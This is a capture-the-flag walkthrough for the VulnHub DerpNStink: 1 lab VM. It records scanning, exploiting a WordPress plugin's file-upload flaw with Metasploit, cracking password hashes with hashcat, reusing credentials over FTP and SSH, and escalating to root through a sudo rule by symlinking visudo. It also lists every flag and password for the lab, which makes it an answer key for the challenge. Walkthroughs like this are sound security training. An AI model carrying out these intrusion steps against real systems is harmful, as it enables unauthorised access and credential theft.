Derpnstink: 1 Walkthrough

Walkthrough for the DerpNStink: 1 (https://www.vulnhub.com/entry/derpnstink-1,221/) CTF challenge image.

Summary

Flags

FlagWhere it was found
flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)In the source of the main html page
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)in the wp_posts database table
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)In flag.txt on the desktop of user stinky
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)In flag.txt of roots directory

Domains

  • derpnstink.local

Credentials

ServiceUsernamePasswordNotes
WordpressadminadminDoes not give access to pretty much anything
Wordpressunclestinkywedgie57Gives access to wordpress admin console
Linux (ssh)mrderpderpderpderpderpderpderpderpRequires key to login via ssh (not found yet). Account does not work on ftp.
Linux (ssh / ftp)stinkywedgie57Requires key to login via ssh (found via accessing ftp)

Walkthrough

A basic nmap ping scan finds the box. Throwing a fuller scan at it finds three services open and some details.

[bash]
root@kali:~# nmap -A -T4 192.168.195.214

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-20 14:44 AEDT
Nmap scan report for 192.168.195.214
Host is up (0.00080s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:2F:D8:BE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 192.168.195.214

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
[/bash]

A preliminary google on each of the service versions doesn’t yield anything terrifically interesting. An initial probe of each service gives us:

  • vsftp doesn’t allow for anonymous login.
  • OpenSSH requires a ssh key to login
  • Apache gives an initial landing page with an interesting graphical effect
  • robots.txt gives me two directories – /php/ (permission denied when I try to load) & /temporary/ (gives me a message of Try Harder)

Running a dirt scan across the web server and looking at http 200 (found a file) gives some better clues.

[bash]
root@kali:~/Documents/dirpnstink# cat dirpnstink_dirb | grep 200
+ http://192.168.195.214/index.html (CODE:200|SIZE:1298)
+ http://192.168.195.214/robots.txt (CODE:200|SIZE:53)
+ http://192.168.195.214/php/info.php (CODE:200|SIZE:0)
+ http://192.168.195.214/temporary/index.html (CODE:200|SIZE:12)
+ http://192.168.195.214/weblog/index.php (CODE:200|SIZE:14678)
+ http://192.168.195.214/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.195.214/javascript/jquery/version (CODE:200|SIZE:5)
+ http://192.168.195.214/php/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.195.214/php/phpmyadmin/index.php (CODE:200|SIZE:8268)
+ http://192.168.195.214/php/phpmyadmin/phpinfo.php (CODE:200|SIZE:8270)
+ http://192.168.195.214/weblog/wp-content/index.php (CODE:200|SIZE:0)
+ http://192.168.195.214/weblog/wp-content/plugins/index.php (CODE:200|SIZE:0)
+ http://192.168.195.214/weblog/wp-content/themes/index.php (CODE:200|SIZE:0)
+ http://192.168.195.214/weblog/wp-includes/js/swfobject.js (CODE:200|SIZE:10231
[/bash]

The landing index.html file wouldn’t let me get to the html source directly on account of the background. Pulling the file down via wget and examining the code directly yields the first flag – flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166).

Browsing to the two other URLs yields a WordPress site and phpmyadmin instance. The WordPress site auto returns a default URL (derpnstink.local) – added to the hosts file and my notes in case it becomes important later.

Throwing a wpscan against the WordPress blog yields a number of vulnerabilities. From reviewing the outputs we have a seriously out of date WordPress Plugin.

[bash]
[+] Enumerating plugins from passive detection …
| 1 plugin found:

[+] Name: slideshow-gallery – v1.4.6
| Last updated: 2017-07-17T09:36:00.000Z
| Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
| Readme: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
[!] The version is out of date, the latest version is 1.6.7.1

[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
Reference: https://wpvulndb.com/vulnerabilities/7532
Reference: http://seclists.org/bugtraq/2014/Sep/1
Reference: http://packetstormsecurity.com/files/131526/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
Reference: https://www.exploit-db.com/exploits/34681/
Reference: https://www.exploit-db.com/exploits/34514/
[i] Fixed in: 1.4.7
[/bash]

CVE-2014-5460 looks to be the easier way in (and comes with it’s own MetaSploit module). Unfortunately to exploit it you need any user credentials on the WordPress blog. Enumerating these using wpscan gives us two (admin and unclestinky). Initial guess at the admin password (admin) gets us in on first attempt.

Off now to metasploit. After setting all the options we now have shell.

[bash]
[*] Meterpreter session 1 opened (192.168.195.212:4444 -> 192.168.195.214:60896) at 2018-03-20 15:13:15 +1100
[+] Deleted zecflkbr.php
meterpreter > ls
Listing: /var/www/html/weblog/wp-content/uploads/slideshow-gallery
==================================================================

Mode Size Type Last modified Name
—- —- —- ————- —-
40777/rwxrwxrwx 4096 dir 2017-11-13 14:43:29 +1100 cache
100644/rw-r–r– 108987 fil 2017-11-13 14:45:12 +1100 derp.png
100644/rw-r–r– 1114 fil 2017-12-13 08:44:11 +1100 elidumfy.php

meterpreter >
[/bash]

Browsing around gives us two things of interest.

  • Main unix accounts are mrderp and stinky (confirmed from checking /home directory and /etc/passwd file)
  • Review of the wp_config.php file gives us the mysql login of root (username) and mysql (password). Checking this on the phpmyadmin page works

Digging through the mysql databases gives two pieces of information. First is the second flag – flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) (found in the wp_hosts) table and second is the WordPress password hashes.

Next step was to throw both usernames against the ftp service. It didn’t like the username mrderp (gives a permission denied – 530 error) but it does prompt for a password on user stinky. Throwing hydra at the ftp service with username stinky and metasploits unix_password file didn’t yield any luck, on to exploring the hashes.

Throwing both the hashes at hashcat (using the default kali rockyou.txt wordlist) gives fairly rapid responses.

[bash]
hashcat -a 0 -m 400 hashes rockyou.txt hashcat

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes…..: 139921507
* Keyspace..: 14344385
* Runtime…: 1 sec

$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/:admin
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57

Session……….: hashcat
Status………..: Cracked
Hash.Type……..: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target……: hashes
Time.Started…..: Mon Mar 12 18:47:52 2018 (1 min, 12 secs)
Time.Estimated…: Mon Mar 12 18:49:04 2018 (0 secs)
Guess.Base…….: File (rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.Dev.#2…..: 49402 H/s (6.58ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Recovered……..: 2/2 (100.00%) Digests, 2/2 (100.00%) Salts
Progress………: 6291456/28688770 (21.93%)
Rejected………: 0/6291456 (0.00%)
Restore.Point….: 2752512/14344385 (19.19%)
Candidates.#2….: wildcat79 -> tomaboi

Started: Mon Mar 12 18:47:45 2018
Stopped: Mon Mar 12 18:49:05 2018
[/bash]

Going through the WordPress admin page with both logins doesn’t yield a lot of interest. The admin credentials doesn’t give access to anything (seems to be normal credentials). The unclestinky credentials give access to the full WordPress admin page, but nothing here of much interest.

Given there is a similar unix username (unclestinky -> stinky) heading over to ftp gives us two things of interest.

[bash]
220 (vsFTPd 3.0.2)
Name (192.168.195.214:root): stinky
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd files/ssh/ssh/ssh/ssh/ssh/ssh/ssh
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 1675 Nov 13 05:22 key.txt
226 Directory send OK.
ftp> cd /files
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 Nov 12 17:23 network-logs
drwxr-xr-x 3 1001 1001 4096 Nov 12 16:36 ssh
-rwxr-xr-x 1 0 0 17 Nov 12 14:06 test.txt
drwxr-xr-x 2 0 0 4096 Nov 12 17:23 tmp
226 Directory send OK.
ftp> cd network-logs
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 719 Nov 12 17:23 derpissues.txt
[/bash]

Downloading and reading each of the three text files gives us a ssh key and a conversation between the two users about issues found (issues explain why user derp doesn’t have a working WordPress account – not certain if this is relevant)

Using the private key found from the ftp dig, we now have a ssh shell

[bash]
root@kali:~/Documents/dirpnstink# ssh -i key.txt stinky@192.168.195.214
Ubuntu 14.04.5 LTS
Last login: Mon Nov 13 00:31:29 2017 from 192.168.1.129
stinky@DeRPnStiNK:~$
[/bash]

Digging around yields a pcap file in the Documents directory and flag3 – flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb) in file flag.txt on the desktop

User stinky can’t sudo (no easy for the win and both user directories are locked down to their respective owners, so no browsing to what mrderp has)

pcap file extracted via sftp and onwards to investigating that. The derpissues.txt file found on the ftp server confirms there were issues that the users took a pcap to resolve, assuming flag4 is in here

Initial investigation shows a lot of failed traffic going to a local dns server, probing it from the shell does show a local DNS server, couldn’t see it remotely as it was bound to localhost.

Digging a bit further we find an interesting piece.

User mrderp was added to the wordpress instance with a password of derpderpderpderpderpderpderp. Logging back in as stinky via ssh – and changing users via su we have a match.

[bash]
root@kali:~/Documents/dirpnstink# ssh -i key.txt stinky@derpnstink.local
stinky@DeRPnStiNK:~$ su mrderp
Password:
mrderp@DeRPnStiNK:/home/stinky$ cd ~/
mrderp@DeRPnStiNK:~$ ls
Desktop Documents Downloads
[/bash]

Poking around further gives us a ssh key and a helpdesk.log file on the users desktop. Ssh key checked (it works) but asks for the users local password after logging in (odd). The helpdesk.log file gives us a pastebin url (https://pastebin.com/RzK9WfGw. Browsing to the page we have one string of raw paste text – “mrderp ALL=(ALL) /home/mrderp/binaries/derpy*”

A short google confirms that is the format of the sudoers file. Logic suggests mrderp can run things using sudo that sit at that path.

[bash]
mrderp@DeRPnStiNK:~/binaries$ ln -s /usr/sbin/visudo derpy1
mrderp@DeRPnStiNK:~/binaries$ ls -al
total 8
drwxrwxr-x 2 mrderp mrderp 4096 Apr 2 02:36 .
drwx—— 12 mrderp mrderp 4096 Apr 2 02:35 ..
lrwxrwxrwx 1 mrderp mrderp 16 Apr 2 02:36 derpy1 -> /usr/sbin/visudo
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy1
[sudo] password for mrderp:
mrderp@DeRPnStiNK:~/binaries$ sudo su –
root@DeRPnStiNK:~# ls
Desktop Documents Downloads
root@DeRPnStiNK:~# cd ~/
root@DeRPnStiNK:~# ls
Desktop Documents Downloads
root@DeRPnStiNK:~# cd Desktop/
root@DeRPnStiNK:~/Desktop# ls
flag.txt
root@DeRPnStiNK:~/Desktop# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

root@DeRPnStiNK:~/Desktop#
[/bash]

A quick experiment later and we are all done.